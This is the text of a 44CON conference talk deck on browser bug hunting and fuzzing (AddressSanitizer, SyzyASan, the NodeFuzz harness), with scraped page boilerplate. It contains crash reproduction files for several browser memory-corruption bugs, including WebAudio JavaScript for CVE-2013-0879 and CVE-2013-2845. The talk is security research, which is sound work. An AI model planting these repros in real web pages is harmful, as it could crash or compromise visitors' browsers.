44CON Slides PDF

Browser Bug Hunting
Memoirs of a last man standing

Atte Kettunen (@attekett)
OUSPG
https://code.google.com/p/ouspg/
Picture by @dominic_sim
Started at OUSPG in summer 2011
First security bug from Chrome 2011-12
Since then
~100 Vulns
~60 Rewards
39 CVEs
Atte Kettunen
Mozilla since 2004
- Sec-High/Critical $3,000
Google since 2010
- Typical security bugs $1,000-$3,133.7
- Possibility for bonus rewards
PoC, exploit, awesomeness
(Microsoft 2013 June 25 - July 25)
Browser Bug Bounty Programs
Easy to get started - Lots of bugs \o/
Helpful vendor security teams and supportive
responses to first bug submissions
Supportive (secretive/competitive)
community of other bounty hunters
Browser Bug Bounty Programs
Use-after-free
DOM
CSS
Rendering
Buffer-overflow
Media formats
Parsers
Decoders
Coordinates
Where the bugs are
AddressSanitizer - global-buffer-overflow - READ of size 2
#0 nsCharTraits<unsigned short>::length()
#1 nsAString_internal::Assign()
.
Repro-file:
<link
rel="stylesheet" href="data:text/css;charset=utf-16,
p#two%1%7Bbackground-color%65535A%3B%7D%
0D%0A"/>
Some bug - CVE-2012-4185 - Firefox
AddressSanitizer - heap-use-after-free - READ of size 2
#0 WebCore::nextBreakablePosition()
#1 ...::RenderBlock::LineBreaker::nextLineBreak()
.
Repro-file:
<html><body>
<ruby>
<q style="column-gap:2;">a
</ruby>
<cite style="word-break: break-all;">a
<q style="text-transform:uppercase;">a
<sup style="text-overflow:ellipsis;">
</body></html>
Some bug - Regression - Chrome
==3213== ERROR: AddressSanitizer heap-buffer-overflow
on address 0x7f50cd6ffcf8 at pc 0x7f50dd159dde bp
0x7fff3e0accd0 sp 0x7fff3e0accc8
READ of size 2 at 0x7f50cd6ffcf8 thread T0
#0 0x7f.de in WebCore::CSSParser::lex(void*) ???:0
#1 0x7f.78 in cssyyparse(void*) ???:0
#2 0x7f.40 in WebCore::CSSParser::parseDeclaration()
.
Repro-file:
<a style=top:-1px>
Some bug - Regression - Chrome
Three golden rules:
Hunting for living
Three golden rules:
1. Stay green
Hunting for living
Three golden rules:
1. Stay green - Features
Hunting for living
Three golden rules:
2. Stay green - Competition
Hunting for living
Three golden rules:
3. Stay green - Tools
Hunting for living
New features are published all the time
New code \o/
Some changes are not highlighted
Minor updates to JavaScript API support etc.
Old bugs fixed
New code \o/
Old features can change
Prefixes disappear(-webkit,-moz),
Features can get disabled
Hunting for living
1. Stay Green - Features
Firefox Aurora - Release note: "Partial support for
Web Audio, targeted at web developers for testing"
(May 17, 2013)
Hunting for living
Tools
Different approach -> Different bugs?
Targets
Find new minefields
Platforms
Different code on different platforms
Hunting for living
@cevans: "@j00ru has melted polar ice with
his PDF fuzzing on 9k cores."
Hunting for living
Instrumentations
New instrumentation -> detect new issues
Build environments
Broken builds @#!#...
Fuzzers
New techniques
Hunting for living
<Q>: WTF??? On Chromium startup:
==25254== ERROR: AddressSanitizer: global-buffer-overflow on address
0x000011d3dde5 at pc 0x5ab21a bp 0x7fff00659450 sp 0x7fff00659428
READ of size 10 at 0x000011d3dde5 thread T0
#0 0x5ab219 in __interceptor_memcmp _asan_rtl_
#1 0xa1edc08 in fillInUnixFile .../sqlite/amalgamation/sqlite3.c:28654
#2 0xa1efe7c in unixOpen .../sqlite/amalgamation/sqlite3.c:29294
<A>:
Diff of /trunk/tools/build/scripts/slave/runtest.py:
+ # Avoid aggressive memcmp checks until http://crbug.com/178677 is fixed.
+ os.environ['ASAN_OPTIONS'] = 'strict_memcmp=0'
Hunting for living
Instrumentation
Fuzzers
Hardware/Infrastructure
Tools
Clang compiler plugin
Adds instrumentation to check memory
access at runtime
Similar to Valgrind
Only 2x slowdown
Created at Google
Used by Google & Mozilla
Linux & OS X
http://www.chromium.org/developers/testing/addresssanitizer
AddressSanitizer
Awesome with use-after-frees
Very good for buffer-overflows and out of
bounds access
Good but confused with type confusions
AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address
0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298
READ of size 8 at 0x6070000268d0 thread T0 (chrome)
#0 0x7f845771029e (... /asan-linux-release-209136/chrome+0x96f229e)
#1 0x7f84576aacea (... /asan-linux-release-209136/chrome+0x968ccea)
#2 0x7f8451ce00f3 (... /asan-linux-release-209136/chrome+0x3cc20f3)
.
0x6070000268d0 is located 64 bytes inside of 72-byte region
[0x607000026890,0x6070000268d8)
freed by thread T19 (AudioOutputDevi) here:
#0 0x7f844f58e101 (... /asan-linux-release-209136/chrome+0x1570101)
#1 0x7f845887b5ec (... /asan-linux-release-209136/chrome+0xa85d5ec)
.
AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address
0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298
READ of size 8 at 0x6070000268d0 thread T0 (chrome)
#0 0x7f845771029e in WebCore::WaveShaperDSPKernel::
lazyInitializeOversampling(...) .../WebKit/Source/wtf/OwnPtr.h:138
#1 0x7.a in WebCore::WaveShaperProcessor::setOversample(...) ...
/WebKit/Source/modules/webaudio/WaveShaperProcessor.cpp:70
.
0x6070000268d0 is located 64 bytes inside of 72-byte region
[0x607000026890,0x6070000268d8)
freed by thread T19 (AudioOutputDevi) here:
#0 0x7.1 in operator delete(void*) _asan_rtl_
#1 0x7.c in WebCore::AudioDSPKernelProcessor::uninitialize()
src/third_party/WebKit/Source/wtf/OwnPtrCommon.h:47
.
AddressSanitizer
Used to instrument binaries
Redirects heap-related calls to own run-
time library
Currently only heap-instrumentation
Chrome/Chromium only atm.
About 3x Slowdown
Windows only
https://code.google.com/p/sawbuck/wiki/SyzyASanDesignDocument
SyzyASan
SyzyASAN error: heap-buffer-overflow on address
0x0379D1A7 (stack_id=0x44CB69D7)
READ of size 8 at 0x0379D000
#0 0x000068ef23be in (unknown)
#1 0x000068f387f4 in (unknown)
#2 0x000068eeb486 in (unknown)
#3 0x000068e8add7 in (unknown)
.
.
.
SyzyASan
Bad access information:
+0x000 alloc_stack : [62] 0x0f999970 Void
+0x0f8 alloc_stack_size : 0x3c '<'
+0x0fc alloc_tid : 0x14a8
+0x100 free_stack : [62] (null)
+0x1f8 free_stack_size : 0 ''
+0x1fc free_tid : 0
+0x200 error_type : 3 ( HEAP_BUFFER_OVERFLOW )
+0x204 access_mode : 0 ( ASAN_READ_ACCESS )
+0x208 access_size : 8
+0x20c shadow_info : [128] "06499E3F is 23 bytes
beyond 384-byte block [06499CA8,06499E28)."
+0x290 microseconds_since_free : 0
SyzyASan
Crash stack:
chrome_dll!SkOpSegment::addTCoincident+0x18e
chrome_dll!SkOpContour::calcCoincidentWinding+0x9f
chrome_dll!CoincidenceCheck+0x3c
chrome_dll!Op+0x26a
.
Allocation stack:
asan_rtl!asan_HeapAlloc+0x48
chrome_dll!malloc+0x17
chrome_dll!realloc+0x15
chrome_dll!SkOpSegment::addT+0x9b
chrome_dll!AddIntersectTs+0xceb
chrome_dll!Op+0x244
SyzyASan
Heap allocation monitoring for Windows
No feedback - Only crash :(
Works on Chrome/Chromium
env: CHROME_ALLOCATOR="winheap"
Enable Chrome error reporting ->
minidumps
Firewall Chrome( No free 0-days for Google ;) )
Debugging tools x86
http://www.chromium.org/developers/testing/page-heap-for-chrome
Page-Heap
ExceptionAddress: 564a0cd7 (chrome_..!WebCore::
WaveShaperDSPKernel::lazyInitializeOversampling+0x0...06)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 27261fe4
Attempt to read from address 27261fe4
.
STACK_TEXT:
chrome_...!WebCore::WaveShaperDSPKernel::
lazyInitializeOversampling+0x6 [...
\webkit\source\modules\webaudio\waveshaperdspkernel.cpp @ 53]
chrome_...!WebCore::WaveShaperProcessor::setOversample+0x29
.
APPLICATION_FAULT_INVALID_POINTER_READ_chrome!WebCore::
WaveShaperDSPKernel::lazyInitializeOversampling+6
Dump-analysis
Dumb fuzzing
Yes, still works
Yes, you can still find bugs with bit-flipping of
image-files
Smart fuzzing
Finds bugs fast but runs out of bugs faster. :(
Fuzzers
Dumb fuzzing
Radamsa || Surku \o/
https://code.google.com/p/ouspg/
Mutate old repros
( find ./src/ -type d -name *crashtest* |
xargs ls; )
Collect winnings
Fuzzers
Smart fuzzing
W3C/MDN(/MSDN)
Again stay green
Most of the JavaScript APIs in
browsers are really similar
Some of the public tools have the logic
in them already
W3C spec + grep + sed = $$$
Fuzzers
Smart fuzzing
WebAudio API - PannerNode - Specification
interface PannerNode : AudioNode {
void setPosition(double x, double y, double z);
void setOrientation(double x, double y, double z);
void setVelocity(double x, double y, double z);
attribute double refDistance;
attribute double maxDistance;
attribute double rolloffFactor;
};
Fuzzers
Smart fuzzing
2D Canvas API - Specification
// rects
void clearRect(unrestricted double x, unrestricted double
y, unrestricted double w, unrestricted double h);
void fillRect(unrestricted double x, unrestricted double y,
unrestricted double w, unrestricted double h);
// shadows
attribute unrestricted double shadowOffsetX; // (default 0)
attribute unrestricted double shadowOffsetY; // (default 0)
attribute unrestricted double shadowBlur; // (default 0)
Fuzzers
Individuals:
Physical machines -> sysadmining <3
SSD <3
RAM++
Vicious cycle of
Bug->Bounty->New HW->Bug->Bounty...
8x Dual Core CPU, 2GB ram, USB-stick,
aka. Badgers
OUSPG - 2011
University HW:
Badgers
6x Quad core AMD A10, 16GB ram, SSD
6x Dual Dual Core AMD antique, 8GB, 10k rpm
BYOD:
4x Quad core i7-3770K, 16GB ram, SSD
And additional 30+ cores misc hardware with
133.7+ GB of ram and bunch of SSDs
OUSPG - 2013
OUSPG - 2013
ClusterFuzz aka. CF
Google fuzzing cluster
2012 -
6000 Chrome instances
50m+ test cases per day
Plans for quadrupling at that time
ASAN, multiple fuzzers, minimization,
regression ranges, verify fixes, dupes &
dupes & dupes...
cluster-fuzz is a soulless bug hunting machine.
It has no want or need for your gratitude. It
lives only to feed on bugs.
ClusterFuzz
12 machines running 24/7
~50 cores, ~133.7GB of RAM
approx. 20m test cases per day
19 file-formats
git, scp, auto-update, auto-minimize
Radamsa and ...
My stuff
Browser fuzzer harness
Written in JavaScript ( Node.js )
Linux, Windows, OS X
Test case generators and instrumentations
loaded as modules
Uses WebSockets for test case injection to
browser
Stable - https://code.google.com/p/ouspg/downloads/list
Trunkish - https://github.com/attekett/NodeFuzz
NodeFuzz
Requirements: Google Chrome installed
$ sudo apt-get install nodejs
$ git clone https://github.com/attekett/NodeFuzz.git
$ cd NodeFuzz
$ npm install
$ vim config.js #Optional
$ node nodefuzz.js
NodeFuzz - Setup - Ubuntu
Fairly new JS API (Chrome 2011, FF
2013)
"The API has been designed to allow modular
routing.(UAF) Basic audio operations are performed
by audio nodes that are linked together to form an
audio routing graphs.(UAF/BOF) Inside a same
context, several sources are supported, with different
kind of channel layout.(UAF/BOF) This modular
design allows for great flexibility and for the creation
of complex audio functions and of dynamic effects.
(BOF)" - MDN
NodeFuzz - module - WebAudio
Bugs found:
Chrome - 4 UAF, 3 BOF
Firefox - 1 UAF, 8 BOF
CVE-2013-0879 - Chrome - BOF
<script>
try{var context= new webkitAudioContext()}catch(e){}
try{var oscillator= context.createOscillator()}catch(e){}
try{oscillator.start(0.701,0.7,0.7)}catch(e){}
setInterval(function(){
try{oscillator.connect(context.destination);}catch(e){}
},4)
try{oscillator.stop(0.70)}catch(e){}
</script>
CVE-2013-2845 - Chrome - UAF
<script>
var Context0= new webkitAudioContext()
var Analyser0=Context0.createAnalyser();
var WaveShaper0=Context0.createWaveShaper();
var Convolver3=Context0.createConvolver();
Analyser0.connect(WaveShaper0);
WaveShaper0.connect(Context0.destination);
Convolver3.connect(Analyser0);
setInterval(function(){
Analyser0.disconnect();
},4)
</script>
DEMO!!!
&&
Q&A

44CON Slides PDF

Transféré par

Informations du document

Description originale:

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

44CON Slides PDF

Transféré par

Droits d'auteur :

Formats disponibles

Browser Bug Hunting

Memoirs of a last man standing

Vous aimerez peut-être aussi